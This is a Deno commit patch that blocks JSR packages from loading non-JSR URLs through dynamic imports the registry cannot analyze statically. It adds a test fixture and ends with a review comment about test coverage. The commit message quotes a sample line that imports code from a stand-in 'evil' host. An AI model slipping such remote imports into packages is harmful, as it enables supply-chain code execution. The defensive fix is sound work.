From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.
---
 tests/testdata/jsr/registry/@denotest/import-https-url/meta.json | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 tests/testdata/jsr/registry/@denotest/import-https-url/meta.json

(limited to 'tests/testdata/jsr/registry/@denotest/import-https-url/meta.json')

diff --git a/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json new file mode 100644 index 000000000..02601e4d0 --- /dev/null +++ b/tests/testdata/jsr/registry/@denotest/import-https-url/meta.json @@ -0,0 +1,5 @@ +{ + "versions": { + "1.0.0": {} + } +}
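Review bot: the new meta.json only declares version "1.0.0" with an empty metadata object, and because this view is limited to that one file, the per-version metadata and the module that performs the unanalyzable dynamic import (the bypass the commit message describes) are not visible here; before merging, confirm that the integration test which uses the @denotest/import-https-url fixture actually loads the package, attempts a dynamic import of a non-JSR https URL through an expression the registry cannot analyze statically, and asserts that Deno refuses the load rather than fetching the URL. It is also worth checking that the same test suite keeps a positive case (a JSR package whose dynamic import resolves to a JSR or npm specifier still succeeds), so the new restriction blocks only the non-JSR URLs the message says it targets.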